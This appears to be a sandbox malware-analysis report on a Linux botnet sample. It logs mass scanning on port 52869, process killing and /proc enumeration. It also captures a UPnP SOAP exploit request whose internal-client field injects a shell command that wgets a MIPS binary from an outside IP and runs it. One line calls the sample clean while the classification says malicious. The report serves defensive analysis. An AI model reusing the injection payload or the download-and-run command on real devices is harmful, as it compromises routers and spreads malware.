Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.30.166.37:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.201.99.160:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.64.254.28:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.247.247.179:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.94.105.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.211.93.196:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.139.165.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.204.142.31:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.101.9.248:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.131.115.105:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.41.34.65:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.38.75.143:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.200.3.45:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.242.216.130:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.228.127.6:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.138.24.133:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.92.45.20:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.104.11.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.223.45.142:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.34.162.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.151.197.183:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.215.105.170:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.235.90.176:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.151.200.43:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.204.37.100:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.220.13.211:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.6.154.180:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.182.68.89:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.190.188.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.97.65.220:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.200.38.140:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.239.119.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.160.179.124:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.206.88.31:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.64.109.234:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.42.248.8:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.46.84.91:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.181.86.98:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.10.15.49:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.209.138.40:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.247.183.74:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.129.43.41:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.99.62.163:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.126.67.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.83.148.102:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.2.46.244:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.52.13.15:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.157.77.211:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.183.104.147:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.218.193.186:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.86.251.15:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.42.39.235:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.188.66.149:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.104.49.75:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.85.87.140:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.111.158.2:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.11.243.125:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.70.129.165:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.251.66.215:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.74.249.148:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.127.163.99:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.205.229.183:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.221.156.253:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.149.184.59:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.19.92.10:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.136.223.247:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.200.32.255:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.46.135.151:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.103.80.182:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.137.159.185:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.22.152.23:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.142.147.29:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.24.133.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.217.74.78:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.51.106.204:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.111.25.254:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.18.142.177:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.174.42.121:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.196.230.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.238.141.248:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.88.85.159:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.31.239.180:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.142.128.174:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.91.119.236:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.55.232.236:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.179.30.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.12.166.125:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.232.129.123:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.233.96.195:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.93.66.38:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.221.233.12:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.244.170.201:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.214.253.152:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.122.158.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.251.238.152:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.198.150.52:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.71.119.106:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.147.193.54:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.22.6.96:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.200.132.37:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.96.168.43:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.60.140.235:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.111.71.245:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.54.155.139:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.60.89.87:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.4.241.203:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.51.152.50:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.18.7.10:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.79.59.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.73.147.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.125.209.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.249.83.33:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.242.205.144:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.114.64.50:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.55.241.140:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.124.187.26:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.168.235.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.245.182.194:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.168.186.232:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.60.108.65:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.84.199.227:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.160.5.77:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.170.68.149:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.20.237.111:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.148.170.122:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.77.145.168:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.105.251.137:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.202.129.248:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.251.230.93:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.226.51.180:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.127.163.65:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 45.60.236.133:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 185.59.71.66:52869
Source: global traffic	TCP traffic: 192.168.2.23:2387 -> 91.117.116.89:52869

Source: /tmp/fbXTgwatuJ (PID: 5240)	Socket: 0.0.0.0::0
Source: /tmp/fbXTgwatuJ (PID: 5240)	Socket: 0.0.0.0::23
Source: /tmp/fbXTgwatuJ (PID: 5240)	Socket: 0.0.0.0::53413
Source: /tmp/fbXTgwatuJ (PID: 5240)	Socket: 0.0.0.0::80
Source: /tmp/fbXTgwatuJ (PID: 5240)	Socket: 0.0.0.0::52869
Source: /tmp/fbXTgwatuJ (PID: 5240)	Socket: 0.0.0.0::37215
Source: /tmp/fbXTgwatuJ (PID: 5246)	Socket: 0.0.0.0::0
Source: /tmp/fbXTgwatuJ (PID: 5246)	Socket: 0.0.0.0::23
Source: /tmp/fbXTgwatuJ (PID: 5246)	Socket: 0.0.0.0::53413
Source: /tmp/fbXTgwatuJ (PID: 5246)	Socket: 0.0.0.0::80
Source: /tmp/fbXTgwatuJ (PID: 5246)	Socket: 0.0.0.0::52869
Source: /tmp/fbXTgwatuJ (PID: 5246)	Socket: 0.0.0.0::37215
Source: /usr/sbin/sshd (PID: 5274)	Socket: 0.0.0.0::22
Source: /usr/sbin/sshd (PID: 5274)	Socket: [::]::22

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 35.255.26.186
Source: unknown	TCP traffic detected without corresponding DNS query: 168.199.34.186
Source: unknown	TCP traffic detected without corresponding DNS query: 18.80.153.85
Source: unknown	TCP traffic detected without corresponding DNS query: 179.15.44.133
Source: unknown	TCP traffic detected without corresponding DNS query: 86.79.126.77
Source: unknown	TCP traffic detected without corresponding DNS query: 136.90.151.190
Source: unknown	TCP traffic detected without corresponding DNS query: 24.118.248.148
Source: unknown	TCP traffic detected without corresponding DNS query: 39.184.248.113
Source: unknown	TCP traffic detected without corresponding DNS query: 67.152.42.8
Source: unknown	TCP traffic detected without corresponding DNS query: 75.201.207.191
Source: unknown	TCP traffic detected without corresponding DNS query: 209.87.52.55
Source: unknown	TCP traffic detected without corresponding DNS query: 201.112.101.153
Source: unknown	TCP traffic detected without corresponding DNS query: 129.8.111.214
Source: unknown	TCP traffic detected without corresponding DNS query: 164.114.139.102
Source: unknown	TCP traffic detected without corresponding DNS query: 205.34.208.205
Source: unknown	TCP traffic detected without corresponding DNS query: 150.189.6.241
Source: unknown	TCP traffic detected without corresponding DNS query: 93.136.219.105
Source: unknown	TCP traffic detected without corresponding DNS query: 165.3.150.82
Source: unknown	TCP traffic detected without corresponding DNS query: 65.240.9.142
Source: unknown	TCP traffic detected without corresponding DNS query: 115.19.209.74
Source: unknown	TCP traffic detected without corresponding DNS query: 194.84.5.211
Source: unknown	TCP traffic detected without corresponding DNS query: 197.193.139.127
Source: unknown	TCP traffic detected without corresponding DNS query: 164.71.254.65
Source: unknown	TCP traffic detected without corresponding DNS query: 79.85.236.197
Source: unknown	TCP traffic detected without corresponding DNS query: 72.149.63.233
Source: unknown	TCP traffic detected without corresponding DNS query: 107.45.243.102
Source: unknown	TCP traffic detected without corresponding DNS query: 94.146.197.101
Source: unknown	TCP traffic detected without corresponding DNS query: 181.44.79.28
Source: unknown	TCP traffic detected without corresponding DNS query: 146.95.195.189
Source: unknown	TCP traffic detected without corresponding DNS query: 108.142.239.125
Source: unknown	TCP traffic detected without corresponding DNS query: 52.221.20.197
Source: unknown	TCP traffic detected without corresponding DNS query: 64.153.50.189
Source: unknown	TCP traffic detected without corresponding DNS query: 160.125.42.221
Source: unknown	TCP traffic detected without corresponding DNS query: 19.137.13.87
Source: unknown	TCP traffic detected without corresponding DNS query: 52.167.216.192
Source: unknown	TCP traffic detected without corresponding DNS query: 203.155.45.164
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.233.132
Source: unknown	TCP traffic detected without corresponding DNS query: 168.213.221.160
Source: unknown	TCP traffic detected without corresponding DNS query: 60.27.55.132
Source: unknown	TCP traffic detected without corresponding DNS query: 74.94.245.149
Source: unknown	TCP traffic detected without corresponding DNS query: 130.88.41.203
Source: unknown	TCP traffic detected without corresponding DNS query: 121.49.236.55
Source: unknown	TCP traffic detected without corresponding DNS query: 98.96.220.217
Source: unknown	TCP traffic detected without corresponding DNS query: 212.245.199.241
Source: unknown	TCP traffic detected without corresponding DNS query: 133.186.57.21
Source: unknown	TCP traffic detected without corresponding DNS query: 2.160.129.207
Source: unknown	TCP traffic detected without corresponding DNS query: 14.252.187.163
Source: unknown	TCP traffic detected without corresponding DNS query: 191.177.43.37
Source: unknown	TCP traffic detected without corresponding DNS query: 211.78.181.162
Source: unknown	TCP traffic detected without corresponding DNS query: 143.53.240.251

Source: fbXTgwatuJ, 5221.1.000000001115a6da.000000009fcb9cee.r-x.sdmp	String found in binary or memory: http://103.3.246.123/bins/Hilix.mips
Source: fbXTgwatuJ, 5221.1.000000001115a6da.000000009fcb9cee.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: fbXTgwatuJ, 5221.1.000000001115a6da.000000009fcb9cee.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

HTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://103.3.246.123/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPo

System Summary:

Sample tries to kill many processes (SIGKILL)

Show sources

Source: /tmp/fbXTgwatuJ (PID: 5240)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 5240, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 1860, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2102, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2180, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2191, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2208, result: successful

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/fbXTgwatuJ (PID: 5240)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 5240, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 1860, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2102, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2180, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2191, result: successful
Source: /tmp/fbXTgwatuJ (PID: 5246)	SIGKILL sent: pid: 2208, result: successful

Source: classification engine

Classification label: mal76.spre.troj.lin@0/2@0/0

Source: fbXTgwatuJ

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/491/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/793/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/772/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/796/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/774/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/797/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/777/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/799/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/658/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/912/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/759/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/936/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/918/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/1/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/761/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/785/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/884/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/720/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/721/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/788/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/789/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/800/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/801/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/847/fd
Source: /tmp/fbXTgwatuJ (PID: 5240)	File opened: /proc/904/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5261/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5262/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5263/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5264/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5265/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5266/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5267/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/5268/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2033/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2033/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2033/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1582/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1582/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1582/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2275/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2275/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1612/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1612/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1612/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1579/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1579/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1579/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1699/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1699/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1699/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1335/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1335/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1335/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1698/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1698/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1698/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2028/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2028/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2028/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1334/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1334/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1334/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1576/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1576/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/1576/exe
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2302/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2302/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/3236/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/3236/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2025/fd
Source: /tmp/fbXTgwatuJ (PID: 5246)	File opened: /proc/2025/fd
